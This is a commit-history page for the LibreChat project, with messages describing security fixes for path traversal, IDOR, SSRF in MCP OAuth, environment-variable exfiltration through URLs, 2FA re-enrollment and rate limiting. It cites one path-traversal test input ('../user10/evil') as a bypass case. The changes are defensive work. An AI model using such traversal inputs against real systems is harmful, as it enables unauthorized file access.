Compare commits

...

18 commits

Author SHA1 Message Date
Danny Avila
cbdc6f6060
📦 chore: Bump NPM Audit Packages (#12227)
Some checks failed
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
Docker Dev Images Build / build (Dockerfile, librechat-dev, node) (push) Has been cancelled
Docker Dev Images Build / build (Dockerfile.multi, librechat-dev-api, api-build) (push) Has been cancelled
Sync Locize Translations & Create Translation PR / Sync Translation Keys with Locize (push) Has been cancelled
Sync Locize Translations & Create Translation PR / Create Translation PR on Version Published (push) Has been cancelled
* 🔧 chore: Update file-type dependency to version 21.3.2 in package-lock.json and package.json

- Upgraded the "file-type" package from version 18.7.0 to 21.3.2 to ensure compatibility with the latest features and security updates.
- Added new dependencies related to the updated "file-type" package, enhancing functionality and performance.

* 🔧 chore: Upgrade undici dependency to version 7.24.1 in package-lock.json and package.json

- Updated the "undici" package from version 7.18.2 to 7.24.1 across multiple package files to ensure compatibility with the latest features and security updates.

* 🔧 chore: Upgrade yauzl dependency to version 3.2.1 in package-lock.json

- Updated the "yauzl" package from version 3.2.0 to 3.2.1 to incorporate the latest features and security updates.

* 🔧 chore: Upgrade hono dependency to version 4.12.7 in package-lock.json

- Updated the "hono" package from version 4.12.5 to 4.12.7 to incorporate the latest features and security updates.
2026-03-14 03:36:03 -04:00
Danny Avila
f67bbb2bc5
🧹 fix: Sanitize Artifact Filenames in Code Execution Output (#12222)
* fix: sanitize artifact filenames to prevent path traversal in code output

* test: Mock sanitizeFilename function in process.spec.js to return the original filename

- Added a mock implementation for the `sanitizeFilename` function in the `process.spec.js` test file to return the original filename, ensuring that tests can run without altering the filename during the testing process.

* fix: use path.relative for traversal check, sanitize all filenames, add security logging

- Replace startsWith with path.relative pattern in saveLocalBuffer, consistent
  with deleteLocalFile and getLocalFileStream in the same file
- Hoist sanitizeFilename call before the image/non-image branch so both code
  paths store the sanitized name in MongoDB
- Log a warning when sanitizeFilename mutates a filename (potential traversal)
- Log a specific warning when saveLocalBuffer throws a traversal error, so
  security events are distinguishable from generic network errors in the catch

* test: improve traversal test coverage and remove mock reimplementation

- Remove partial sanitizeFilename reimplementation from process-traversal tests;
  use controlled mock returns to verify processCodeOutput wiring instead
- Add test for image branch sanitization
- Use mkdtempSync for test isolation in crud-traversal to avoid parallel worker
  collisions
- Add prefix-collision bypass test case (../user10/evil vs user1 directory)

* fix: use path.relative in isValidPath to prevent prefix-collision bypass

Pre-existing startsWith check without path separator had the same class
of prefix-collision vulnerability fixed in saveLocalBuffer.
2026-03-14 03:09:26 -04:00
Danny Avila
35a35dc2e9
📏 refactor: Add File Size Limits to Conversation Imports (#12221)
* fix: add file size limits to conversation import multer instance

* fix: address review findings for conversation import file size limits

* fix: use local jest.mock for data-schemas instead of global moduleNameMapper

The global @librechat/data-schemas mock in jest.config.js only provided
logger, breaking all tests that depend on createModels from the same
package. Replace with a virtual jest.mock scoped to the import spec file.

* fix: move import to top of file, pre-compute upload middleware, assert logger.warn in tests

* refactor: move resolveImportMaxFileSize to packages/api

New backend logic belongs in packages/api as TypeScript. Delete the
api/server/utils/import/limits.js wrapper and import directly from
@librechat/api in convos.js and importConversations.js. Resolver unit
tests move to packages/api; the api/ spec retains only multer behavior
tests.

* chore: rename importLimits to import

* fix: stale type reference and mock isolation in import tests

Update typeof import path from '../importLimits' to '../import' after
the rename. Clear mockLogger.warn in beforeEach to prevent cross-test
accumulation.

* fix: add resolveImportMaxFileSize to @librechat/api mock in convos.spec.js

* fix: resolve jest.mock hoisting issue in import tests

jest.mock factories are hoisted above const declarations, so the
mockLogger reference was undefined at factory evaluation time. Use a
direct import of the mocked logger module instead.

* fix: remove virtual flag from data-schemas mock for CI compatibility

virtual: true prevents the mock from intercepting the real module in
CI where @librechat/data-schemas is built, causing import.ts to use
the real logger while the test asserts against the mock.
2026-03-14 03:06:29 -04:00
Danny Avila
c6982dc180
🛡️ fix: Agent Permission Check on Image Upload Route (#12219)
* fix: add agent permission check to image upload route

* refactor: remove unused SystemRoles import and format test file for clarity

* fix: address review findings for image upload agent permission check

* refactor: move agent upload auth logic to TypeScript in packages/api

Extract pure authorization logic from agentPermCheck.js into
checkAgentUploadAuth() in packages/api/src/files/agentUploadAuth.ts.
The function returns a structured result ({ allowed, status, error })
instead of writing HTTP responses directly, eliminating the dual
responsibility and confusing sentinel return value. The JS wrapper
in /api is now a thin adapter that translates the result to HTTP.

* test: rewrite image upload permission tests as integration tests

Replace mock-heavy images-agent-perm.spec.js with integration tests
using MongoMemoryServer, real models, and real PermissionService.
Follows the established pattern in files.agents.test.js. Moves test
to sibling location (images.agents.test.js) matching backend convention.
Adds temp file cleanup assertions on 403/404 responses and covers
message_file exemption paths (boolean true, string "true", false).

* fix: widen AgentUploadAuthDeps types to accept ObjectId from Mongoose

The injected getAgent returns Mongoose documents where _id and author
are Types.ObjectId at runtime, not string. Widen the DI interface to
accept string | Types.ObjectId for _id, author, and resourceId so the
contract accurately reflects real callers.

* chore: move agent upload auth into files/agents/ subdirectory

* refactor: delete agentPermCheck.js wrapper, move verifyAgentUploadPermission to packages/api

The /api-only dependencies (getAgent, checkPermission) are now passed
as object-field params from the route call sites. Both images.js and
files.js import verifyAgentUploadPermission from @librechat/api and
inject the deps directly, eliminating the intermediate JS wrapper.

* style: fix import type ordering in agent upload auth

* fix: prevent token TTL race in MCPTokenStorage.storeTokens

When expires_in is provided, use it directly instead of round-tripping
through Date arithmetic. The previous code computed accessTokenExpiry
as a Date, then after an async encryptV2 call, recomputed expiresIn by
subtracting Date.now(). On loaded CI runners the elapsed time caused
Math.floor to truncate to 0, triggering the 1-year fallback and making
the token appear permanently valid — so refresh never fired.
2026-03-14 02:57:56 -04:00
Danny Avila
71a3b48504
🔑 fix: Require OTP Verification for 2FA Re-Enrollment and Backup Code Regeneration (#12223)
* fix: require OTP verification for 2FA re-enrollment and backup code regeneration

* fix: require OTP verification for account deletion when 2FA is enabled

* refactor: Improve code formatting and readability in TwoFactorController and UserController

- Reformatted code in TwoFactorController and UserController for better readability by aligning parameters and breaking long lines.
- Updated test cases in deleteUser.spec.js and TwoFactorController.spec.js to enhance clarity by formatting object parameters consistently.

* refactor: Consolidate OTP and backup code verification logic in TwoFactorController and UserController

- Introduced a new `verifyOTPOrBackupCode` function to streamline the verification process for TOTP tokens and backup codes across multiple controllers.
- Updated the `enable2FA`, `disable2FA`, and `deleteUserController` methods to utilize the new verification function, enhancing code reusability and readability.
- Adjusted related tests to reflect the changes in verification logic, ensuring consistent behavior across different scenarios.
- Improved error handling and response messages for verification failures, providing clearer feedback to users.

* chore: linting

* refactor: Update BackupCodesItem component to enhance OTP verification logic

- Consolidated OTP input handling by moving the 2FA verification UI logic to a more consistent location within the component.
- Improved the state management for OTP readiness, ensuring the regenerate button is only enabled when the OTP is ready.
- Cleaned up imports by removing redundant type imports, enhancing code clarity and maintainability.

* chore: lint

* fix: stage 2FA re-enrollment in pending fields to prevent disarmament window

enable2FA now writes to pendingTotpSecret/pendingBackupCodes instead of
overwriting the live fields. confirm2FA performs the atomic swap only after
the new TOTP code is verified. If the user abandons mid-flow, their
existing 2FA remains active and intact.
2026-03-14 01:51:31 -04:00
Danny Avila
189cdf581d
🔐 fix: Add User Filter to Message Deletion (#12220)
* fix: add user filter to message deletion to prevent IDOR

* refactor: streamline DELETE request syntax in messages-delete test

- Simplified the DELETE request syntax in the messages-delete.spec.js test file by combining multiple lines into a single line for improved readability. This change enhances the clarity of the test code without altering its functionality.

* fix: address review findings for message deletion IDOR fix

* fix: add user filter to message deletion in conversation tests

- Included a user filter in the message deletion test to ensure proper handling of user-specific deletions, enhancing the accuracy of the test case and preventing potential IDOR vulnerabilities.

* chore: lint
2026-03-13 23:42:37 -04:00
Danny Avila
ca79a03135
🚦 fix: Add Rate Limiting to Conversation Duplicate Endpoint (#12218)
* fix: add rate limiting to conversation duplicate endpoint

* chore: linter

* fix: address review findings for conversation duplicate rate limiting

* refactor: streamline test mocks for conversation routes

- Consolidated mock implementations into a dedicated `convos-route-mocks.js` file to enhance maintainability and readability of test files.
- Updated tests in `convos-duplicate-ratelimit.spec.js` and `convos.spec.js` to utilize the new mock structure, improving clarity and reducing redundancy.
- Enhanced the `duplicateConversation` function to accept an optional title parameter for better flexibility in conversation duplication.

* chore: rename files
2026-03-13 23:40:44 -04:00
Danny Avila
fa9e1b228a
🪪 fix: MCP API Responses and OAuth Validation (#12217)
* 🔒 fix: Validate MCP Configs in Server Responses

* 🔒 fix: Enhance OAuth URL Validation in MCPOAuthHandler

- Introduced validation for OAuth URLs to ensure they do not target private or internal addresses, enhancing security against SSRF attacks.
- Updated the OAuth flow to validate both authorization and token URLs before use, ensuring compliance with security standards.
- Refactored redirect URI handling to streamline the OAuth client registration process.
- Added comprehensive error handling for invalid URLs, improving robustness in OAuth interactions.

* 🔒 feat: Implement Permission Checks for MCP Server Management

- Added permission checkers for MCP server usage and creation, enhancing access control.
- Updated routes for reinitializing MCP servers and retrieving authentication values to include these permission checks, ensuring only authorized users can access these functionalities.
- Refactored existing permission logic to improve clarity and maintainability.

* 🔒 fix: Enhance MCP Server Response Validation and Redaction

- Updated MCP route tests to use `toMatchObject` for better validation of server response structures, ensuring consistency in expected properties.
- Refactored the `redactServerSecrets` function to streamline the removal of sensitive information, ensuring that user-sourced API keys are properly redacted while retaining their source.
- Improved OAuth security tests to validate rejection of private URLs across multiple endpoints, enhancing protection against SSRF vulnerabilities.
- Added comprehensive tests for the `redactServerSecrets` function to ensure proper handling of various server configurations, reinforcing security measures.

* chore: eslint

* 🔒 fix: Enhance OAuth Server URL Validation in MCPOAuthHandler

- Added validation for discovered authorization server URLs to ensure they meet security standards.
- Improved logging to provide clearer insights when an authorization server is found from resource metadata.
- Refactored the handling of authorization server URLs to enhance robustness against potential security vulnerabilities.

* 🔒 test: Bypass SSRF validation for MCP OAuth Flow tests

- Mocked SSRF validation functions to allow tests to use real local HTTP servers, facilitating more accurate testing of the MCP OAuth flow.
- Updated test setup to ensure compatibility with the new mocking strategy, enhancing the reliability of the tests.

* 🔒 fix: Add Validation for OAuth Metadata Endpoints in MCPOAuthHandler

- Implemented checks for the presence and validity of registration and token endpoints in the OAuth metadata, enhancing security by ensuring that these URLs are properly validated before use.
- Improved error handling and logging to provide better insights during the OAuth metadata processing, reinforcing the robustness of the OAuth flow.

* 🔒 refactor: Simplify MCP Auth Values Endpoint Logic

- Removed redundant permission checks for accessing the MCP server resource in the auth-values endpoint, streamlining the request handling process.
- Consolidated error handling and response structure for improved clarity and maintainability.
- Enhanced logging for better insights during the authentication value checks, reinforcing the robustness of the endpoint.

* 🔒 test: Refactor LeaderElection Integration Tests for Improved Cleanup

- Moved Redis key cleanup to the beforeEach hook to ensure a clean state before each test.
- Enhanced afterEach logic to handle instance resignations and Redis key deletion more robustly, improving test reliability and maintainability.
2026-03-13 23:18:56 -04:00
Danny Avila
f32907cd36
🔏 fix: MCP Server URL Schema Validation (#12204)
Some checks are pending
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
* fix: MCP server configuration validation and schema

- Added tests to reject URLs containing environment variable references for SSE, streamable-http, and websocket types in the MCP routes.
- Introduced a new schema in the data provider to ensure user input URLs do not resolve environment variables, enhancing security against potential leaks.
- Updated existing MCP server user input schema to utilize the new validation logic, ensuring consistent handling of user-supplied URLs across the application.

* fix: MCP URL validation to reject env variable references

- Updated tests to ensure that URLs for SSE, streamable-http, and websocket types containing environment variable patterns are rejected, improving security against potential leaks.
- Refactored the MCP server user input schema to enforce stricter validation rules, preventing the resolution of environment variables in user-supplied URLs.
- Introduced new test cases for various URL types to validate the rejection logic, ensuring consistent handling across the application.

* test: Enhance MCPServerUserInputSchema tests for environment variable handling

- Introduced new test cases to validate the prevention of environment variable exfiltration through user input URLs in the MCPServerUserInputSchema.
- Updated existing tests to confirm that URLs containing environment variable patterns are correctly resolved or rejected, improving security against potential leaks.
- Refactored test structure to better organize environment variable handling scenarios, ensuring comprehensive coverage of edge cases.
2026-03-12 23:19:31 -04:00
github-actions[bot]
65b0bfde1b
🌍 i18n: Update translation.json with latest translations (#12203)
Some checks are pending
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
2026-03-12 20:48:05 -04:00
Danny Avila
3ddf62c8e5
🫙 fix: Force MeiliSearch Full Sync on Empty Index State (#12202)
Some checks failed
Docker Dev Images Build / build (Dockerfile, librechat-dev, node) (push) Has been cancelled
Docker Dev Images Build / build (Dockerfile.multi, librechat-dev-api, api-build) (push) Has been cancelled
Sync Locize Translations & Create Translation PR / Sync Translation Keys with Locize (push) Has been cancelled
Sync Locize Translations & Create Translation PR / Create Translation PR on Version Published (push) Has been cancelled
* fix: meili index sync with unindexed documents

- Updated `performSync` function to force a full sync when a fresh MeiliSearch index is detected, even if the number of unindexed messages or convos is below the sync threshold.
- Added logging to indicate when a fresh index is detected and a full sync is initiated.
- Introduced new tests to validate the behavior of the sync logic under various conditions, ensuring proper handling of fresh indexes and threshold scenarios.

This change improves the reliability of the synchronization process, ensuring that all documents are indexed correctly when starting with a fresh index.

* refactor: update sync logic for unindexed documents in MeiliSearch

- Renamed variables in `performSync` to improve clarity, changing `freshIndex` to `noneIndexed` for better understanding of the sync condition.
- Adjusted the logic to ensure a full sync is forced when no messages or conversations are marked as indexed, even if below the sync threshold.
- Updated related tests to reflect the new logging messages and conditions, enhancing the accuracy of the sync threshold logic.

This change improves the readability and reliability of the synchronization process, ensuring all documents are indexed correctly when starting with a fresh index.

* fix: enhance MeiliSearch index creation error handling

- Updated the `mongoMeili` function to improve logging and error handling during index creation in MeiliSearch.
- Added handling for `MeiliSearchTimeOutError` to log a warning when index creation times out.
- Enhanced logging to differentiate between successful index creation and specific failure reasons, including cases where the index already exists.
- Improved debug logging for index creation tasks to provide clearer insights into the process.

This change enhances the robustness of the index creation process and improves observability for troubleshooting.

* fix: update MeiliSearch index creation error handling

- Modified the `mongoMeili` function to check for any status other than 'succeeded' during index creation, enhancing error detection.
- Improved logging to provide clearer insights when an index creation task fails, particularly for cases where the index already exists.

This change strengthens the error handling mechanism for index creation in MeiliSearch, ensuring better observability and reliability.
2026-03-12 20:43:23 -04:00
github-actions[bot]
fc6f7a337d
🌍 i18n: Update translation.json with latest translations (#12176)
Some checks failed
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Has been cancelled
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Has been cancelled
Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
2026-03-11 11:46:55 -04:00
Danny Avila
9a5d7eaa4e
refactor: Replace tiktoken with ai-tokenizer (#12175)
Some checks failed
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
Docker Dev Images Build / build (Dockerfile, librechat-dev, node) (push) Has been cancelled
Docker Dev Images Build / build (Dockerfile.multi, librechat-dev-api, api-build) (push) Has been cancelled
Sync Locize Translations & Create Translation PR / Sync Translation Keys with Locize (push) Has been cancelled
Sync Locize Translations & Create Translation PR / Create Translation PR on Version Published (push) Has been cancelled
* chore: Update dependencies by adding ai-tokenizer and removing tiktoken

- Added ai-tokenizer version 1.0.6 to package.json and package-lock.json across multiple packages.
- Removed tiktoken version 1.0.15 from package.json and package-lock.json in the same locations, streamlining dependency management.

* refactor: replace js-tiktoken with ai-tokenizer

- Added support for 'claude' encoding in the AgentClient class to improve model compatibility.
- Updated Tokenizer class to utilize 'ai-tokenizer' for both 'o200k_base' and 'claude' encodings, replacing the previous 'tiktoken' dependency.
- Refactored tests to reflect changes in tokenizer behavior and ensure accurate token counting for both encoding types.
- Removed deprecated references to 'tiktoken' and adjusted related tests for improved clarity and functionality.

* chore: remove tiktoken mocks from DALLE3 tests

- Eliminated mock implementations of 'tiktoken' from DALLE3-related test files to streamline test setup and align with recent dependency updates.
- Adjusted related test structures to ensure compatibility with the new tokenizer implementation.

* chore: Add distinct encoding support for Anthropic Claude models

- Introduced a new method `getEncoding` in the AgentClient class to handle the specific BPE tokenizer for Claude models, ensuring compatibility with the distinct encoding requirements.
- Updated documentation to clarify the encoding logic for Claude and other models.

* docs: Update return type documentation for getEncoding method in AgentClient

- Clarified the return type of the getEncoding method to specify that it can return an EncodingName or undefined, enhancing code readability and type safety.

* refactor: Tokenizer class and error handling

- Exported the EncodingName type for broader usage.
- Renamed encodingMap to encodingData for clarity.
- Improved error handling in getTokenCount method to ensure recovery attempts are logged and return 0 on failure.
- Updated countTokens function documentation to specify the use of 'o200k_base' encoding.

* refactor: Simplify encoding documentation and export type

- Updated the getEncoding method documentation to clarify the default behavior for non-Anthropic Claude models.
- Exported the EncodingName type separately from the Tokenizer module for improved clarity and usage.

* test: Update text processing tests for token limits

- Adjusted test cases to handle smaller text sizes, changing scenarios from ~120k tokens to ~20k tokens for both the real tokenizer and countTokens functions.
- Updated token limits in tests to reflect new constraints, ensuring tests accurately assess performance and call reduction.
- Enhanced console log messages for clarity regarding token counts and reductions in the updated scenarios.

* refactor: Update Tokenizer imports and exports

- Moved Tokenizer and countTokens exports to the tokenizer module for better organization.
- Adjusted imports in memory.ts to reflect the new structure, ensuring consistent usage across the codebase.
- Updated memory.test.ts to mock the Tokenizer from the correct module path, enhancing test accuracy.

* refactor: Tokenizer initialization and error handling

- Introduced an async `initEncoding` method to preload tokenizers, improving performance and accuracy in token counting.
- Updated `getTokenCount` to handle uninitialized tokenizers more gracefully, ensuring proper recovery and logging on errors.
- Removed deprecated synchronous tokenizer retrieval, streamlining the overall tokenizer management process.

* test: Enhance tokenizer tests with initialization and encoding checks

- Added `beforeAll` hooks to initialize tokenizers for 'o200k_base' and 'claude' encodings before running tests, ensuring proper setup.
- Updated tests to validate the loading of encodings and the correctness of token counts for both 'o200k_base' and 'claude'.
- Improved test structure to deduplicate concurrent initialization calls, enhancing performance and reliability.
2026-03-10 23:14:52 -04:00
Danny Avila
fcb344da47
🛂 fix: MCP OAuth Race Conditions, CSRF Fallback, and Token Expiry Handling (#12171)
Some checks are pending
Docker Dev Branch Images Build / build (Dockerfile, lc-dev, node) (push) Waiting to run
Docker Dev Branch Images Build / build (Dockerfile.multi, lc-dev-api, api-build) (push) Waiting to run
* fix: Implement race conditions in MCP OAuth flow

- Added connection mutex to coalesce concurrent `getUserConnection` calls, preventing multiple simultaneous attempts.
- Enhanced flow state management to retry once when a flow state is missing, improving resilience against race conditions.
- Introduced `ReauthenticationRequiredError` for better error handling when access tokens are expired or missing.
- Updated tests to cover new race condition scenarios and ensure proper handling of OAuth flows.

* fix: Stale PENDING flow detection and OAuth URL re-issuance

PENDING flows in handleOAuthRequired now check createdAt age — flows
older than 2 minutes are treated as stale and replaced instead of
joined. Fixes the case where a leftover PENDING flow from a previous
session blocks new OAuth initiation.

authorizationUrl is now stored in MCPOAuthFlowMetadata so that when a
second caller joins an active PENDING flow (e.g., the SSE-emitting path
in ToolService), it can re-issue the URL to the user via oauthStart.

* fix: CSRF fallback via active PENDING flow in OAuth callback

When the OAuth callback arrives without CSRF or session cookies (common
in the chat/SSE flow where cookies can't be set on streaming responses),
fall back to validating that a PENDING flow exists for the flowId. This
is safe because the flow was created server-side after JWT authentication
and the authorization code is PKCE-protected.

* test: Extract shared OAuth test server helpers

Move MockKeyv, getFreePort, trackSockets, and createOAuthMCPServer into
a shared helpers/oauthTestServer module. Enhance the test server with
refresh token support, token rotation, metadata discovery, and dynamic
client registration endpoints. Add InMemoryTokenStore for token storage
tests.

Refactor MCPOAuthRaceCondition.test.ts to import from shared helpers.

* test: Add comprehensive MCP OAuth test modules

MCPOAuthTokenStorage — 21 tests for storeTokens/getTokens with
InMemoryTokenStore: encrypt/decrypt round-trips, expiry calculation,
refresh callback wiring, ReauthenticationRequiredError paths.

MCPOAuthFlow — 10 tests against real HTTP server: token refresh with
stored client info, refresh token rotation, metadata discovery, dynamic
client registration, full store/retrieve/expire/refresh lifecycle.

MCPOAuthConnectionEvents — 5 tests for MCPConnection OAuth event cycle
with real OAuth-gated MCP server: oauthRequired emission on 401,
oauthHandled reconnection, oauthFailed rejection, token expiry detection.

MCPOAuthTokenExpiry — 12 tests for the token expiry edge case: refresh
success/failure paths, ReauthenticationRequiredError, PENDING flow CSRF
fallback, authorizationUrl metadata storage, full re-auth cycle after
refresh failure, concurrent expired token coalescing, stale PENDING
flow detection.

* test: Enhance MCP OAuth connection tests with cooldown reset

Added a `beforeEach` hook to clear the cooldown for `MCPConnection` before each test, ensuring a clean state. Updated the race condition handling in the tests to properly clear the timeout, improving reliability in the event data retrieval process.

* refactor: PENDING flow management and state recovery in MCP OAuth

- Introduced a constant `PENDING_STALE_MS` to define the age threshold for PENDING flows, improving the handling of stale flows.
- Updated the logic in `MCPConnectionFactory` and `FlowStateManager` to check the age of PENDING flows before joining or reusing them.
- Modified the `completeFlow` method to return false when the flow state is deleted, ensuring graceful handling of race conditions.
- Enhanced tests to validate the new behavior and ensure robustness against state recovery issues.

* refactor: MCP OAuth flow management and testing

- Updated the `completeFlow` method to log warnings when a tool flow state is not found during completion, improving error handling.
- Introduced a new `normalizeExpiresAt` function to standardize expiration timestamp handling across the application.
- Refactored token expiration checks in `MCPConnectionFactory` to utilize the new normalization function, ensuring consistent behavior.
- Added a comprehensive test suite for OAuth callback CSRF fallback logic, validating the handling of PENDING flows and their staleness.
- Enhanced existing tests to cover new expiration normalization logic and ensure robust flow state management.

* test: Add CSRF fallback tests for active PENDING flows in MCP OAuth

- Introduced new tests to validate CSRF fallback behavior when a fresh PENDING flow exists without cookies, ensuring successful OAuth callback handling.
- Added scenarios to reject requests when no PENDING flow exists, when only a COMPLETED flow is present, and when a PENDING flow is stale, enhancing the robustness of flow state management.
- Improved overall test coverage for OAuth callback logic, reinforcing the handling of CSRF validation failures.

* chore: imports order

* refactor: Update UserConnectionManager to conditionally manage pending connections

- Modified the logic in `UserConnectionManager` to only set pending connections if `forceNew` is false, preventing unnecessary overwrites.
- Adjusted the cleanup process to ensure pending connections are only deleted when not forced, enhancing connection management efficiency.

* refactor: MCP OAuth flow state management

- Introduced a new method `storeStateMapping` in `MCPOAuthHandler` to securely map the OAuth state parameter to the flow ID, improving callback resolution and security against forgery.
- Updated the OAuth initiation and callback handling in `mcp.js` to utilize the new state mapping functionality, ensuring robust flow management.
- Refactored `MCPConnectionFactory` to store state mappings during flow initialization, enhancing the integrity of the OAuth process.
- Adjusted comments to clarify the purpose of state parameters in authorization URLs, reinforcing code readability.

* refactor: MCPConnection with OAuth recovery handling

- Added `oauthRecovery` flag to manage OAuth recovery state during connection attempts.
- Introduced `decrementCycleCount` method to reduce the circuit breaker's cycle count upon successful reconnection after OAuth recovery.
- Updated connection logic to reset the `oauthRecovery` flag after handling OAuth, improving state management and connection reliability.

* chore: Add debug logging for OAuth recovery cycle count decrement

- Introduced a debug log statement in the `MCPConnection` class to track the decrement of the cycle count after a successful reconnection during OAuth recovery.
- This enhancement improves observability and aids in troubleshooting connection issues related to OAuth recovery.

* test: Add OAuth recovery cycle management tests

- Introduced new tests for the OAuth recovery cycle in `MCPConnection`, validating the decrement of cycle counts after successful reconnections.
- Added scenarios to ensure that the cycle count is not decremented on OAuth failures, enhancing the robustness of connection management.
- Improved test coverage for OAuth reconnect scenarios, ensuring reliable behavior under various conditions.

* feat: Implement circuit breaker configuration in MCP

- Added circuit breaker settings to `.env.example` for max cycles, cycle window, and cooldown duration.
- Refactored `MCPConnection` to utilize the new configuration values from `mcpConfig`, enhancing circuit breaker management.
- Improved code maintainability by centralizing circuit breaker parameters in the configuration file.

* refactor: Update decrementCycleCount method for circuit breaker management

- Changed the visibility of the `decrementCycleCount` method in `MCPConnection` from private to public static, allowing it to be called with a server name parameter.
- Updated calls to `decrementCycleCount` in `MCPConnectionFactory` to use the new static method, improving clarity and consistency in circuit breaker management during connection failures and OAuth recovery.
- Enhanced the handling of circuit breaker state by ensuring the method checks for the existence of the circuit breaker before decrementing the cycle count.

* refactor: cycle count decrement on tool listing failure

- Added a call to `MCPConnection.decrementCycleCount` in the `MCPConnectionFactory` to handle cases where unauthenticated tool listing fails, improving circuit breaker management.
- This change ensures that the cycle count is decremented appropriately, maintaining the integrity of the connection recovery process.

* refactor: Update circuit breaker configuration and logic

- Enhanced circuit breaker settings in `.env.example` to include new parameters for failed rounds and backoff strategies.
- Refactored `MCPConnection` to utilize the updated configuration values from `mcpConfig`, improving circuit breaker management.
- Updated tests to reflect changes in circuit breaker logic, ensuring accurate validation of connection behavior under rapid reconnect scenarios.

* feat: Implement state mapping deletion in MCP flow management

- Added a new method `deleteStateMapping` in `MCPOAuthHandler` to remove orphaned state mappings when a flow is replaced, preventing old authorization URLs from resolving after a flow restart.
- Updated `MCPConnectionFactory` to call `deleteStateMapping` during flow cleanup, ensuring proper management of OAuth states.
- Enhanced test coverage for state mapping functionality to validate the new deletion logic.
2026-03-10 21:15:01 -04:00
Danny Avila
6167ce6e57
🧪 chore: MCP Reconnect Storm Follow-Up Fixes and Integration Tests (#12172)
* 🧪 test: Add reconnection storm regression tests for MCPConnection

Introduced a comprehensive test suite for reconnection storm scenarios, validating circuit breaker, throttling, cooldown, and timeout fixes. The tests utilize real MCP SDK transports and a StreamableHTTP server to ensure accurate behavior under rapid connect/disconnect cycles and error handling for SSE 400/405 responses. This enhances the reliability of the MCPConnection by ensuring proper handling of reconnection logic and circuit breaker functionality.

* 🔧 fix: Update createUnavailableToolStub to return structured response

Modified the `createUnavailableToolStub` function to return an array containing the unavailable message and a null value, enhancing the response structure. Additionally, added a debug log to skip tool creation when the result is null, improving the handling of reconnection scenarios in the MCP service.

* 🧪 test: Enhance MCP tool creation tests for cache and throttle interactions

Added new test cases for the `createMCPTool` function to validate the caching behavior when tools are unavailable or throttled. The tests ensure that tools are correctly cached as missing and prevent unnecessary reconnects across different users, improving the reliability of the MCP service under concurrent usage scenarios. Additionally, introduced a test for the `createMCPTools` function to verify that it returns an empty array when reconnect is throttled, ensuring proper handling of throttling logic.

* 📝 docs: Update AGENTS.md with testing philosophy and guidelines

Expanded the testing section in AGENTS.md to emphasize the importance of using real logic over mocks, advocating for the use of spies and real dependencies in tests. Added specific recommendations for testing with MongoDB and MCP SDK, highlighting the need to mock only uncontrollable external services. This update aims to improve testing practices and encourage more robust test implementations.

* 🧪 test: Enhance reconnection storm tests with socket tracking and SSE handling

Updated the reconnection storm test suite to include a new socket tracking mechanism for better resource management during tests. Improved the handling of SSE 400/405 responses by ensuring they are processed in the same branch as 404 errors, preventing unhandled cases. This enhances the reliability of the MCPConnection under rapid reconnect scenarios and ensures proper error handling.

* 🔧 fix: Implement cache eviction for stale reconnect attempts and missing tools

Added an `evictStale` function to manage the size of the `lastReconnectAttempts` and `missingToolCache` maps, ensuring they do not exceed a maximum cache size. This enhancement improves resource management by removing outdated entries based on a specified time-to-live (TTL), thereby optimizing the MCP service's performance during reconnection scenarios.
2026-03-10 17:44:13 -04:00
Danny Avila
c0e876a2e6
🔄 refactor: OAuth Metadata Discovery with Origin Fallback (#12170)
* 🔄 refactor: OAuth Metadata Discovery with Origin Fallback

Updated the `discoverWithOriginFallback` method to improve the handling of OAuth authorization server metadata discovery. The method now retries with the origin URL when discovery fails for a path-based URL, ensuring consistent behavior across `discoverMetadata` and token refresh flows. This change reduces code duplication and enhances the reliability of the OAuth flow by providing a unified implementation for origin fallback logic.

* 🧪 test: Add tests for OAuth Token Refresh with Origin Fallback

Introduced new tests for the `refreshOAuthTokens` method in `MCPOAuthHandler` to validate the retry mechanism with the origin URL when path-based discovery fails. The tests cover scenarios where the first discovery attempt throws an error and the subsequent attempt succeeds, as well as cases where the discovery fails entirely. This enhances the reliability of the OAuth token refresh process by ensuring proper handling of discovery failures.

* chore: imports order

* fix: Improve Base URL Logging and Metadata Discovery in MCPOAuthHandler

Updated the logging to use a consistent base URL object when handling discovery failures in the MCPOAuthHandler. This change enhances error reporting by ensuring that the base URL is logged correctly, and it refines the metadata discovery process by returning the result of the discovery attempt with the base URL, improving the reliability of the OAuth flow.
2026-03-10 16:19:07 -04:00
Oreon Lothamer
eb6328c1d9
🛤️ fix: Base URL Fallback for Path-based OAuth Discovery in Token Refresh (#12164)
* fix: add base URL fallback for path-based OAuth discovery in token refresh

The two `refreshOAuthTokens` paths in `MCPOAuthHandler` were missing the
origin-URL fallback that `initiateOAuthFlow` already had. With MCP SDK
1.27.1, `buildDiscoveryUrls` appends the server path to the
`.well-known` URL (e.g. `/.well-known/oauth-authorization-server/mcp`),
which returns 404 for servers like Sentry that only expose the root
discovery endpoint (`/.well-known/oauth-authorization-server`).

Without the fallback, discovery returns null during refresh, the token
endpoint resolves to the wrong URL, and users are prompted to
re-authenticate every time their access token expires instead of the
refresh token being exchanged silently.

Both refresh paths now mirror the `initiateOAuthFlow` pattern: if
discovery fails and the server URL has a non-root path, retry with just
the origin URL.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* refactor: extract discoverWithOriginFallback helper; add tests

Extract the duplicated path-based URL retry logic from both
`refreshOAuthTokens` branches into a single private static helper
`discoverWithOriginFallback`, reducing the risk of the two paths
drifting in the future.

Add three tests covering the new behaviour:
- stored clientInfo path: asserts discovery is called twice (path then
  origin) and that the token endpoint from the origin discovery is used
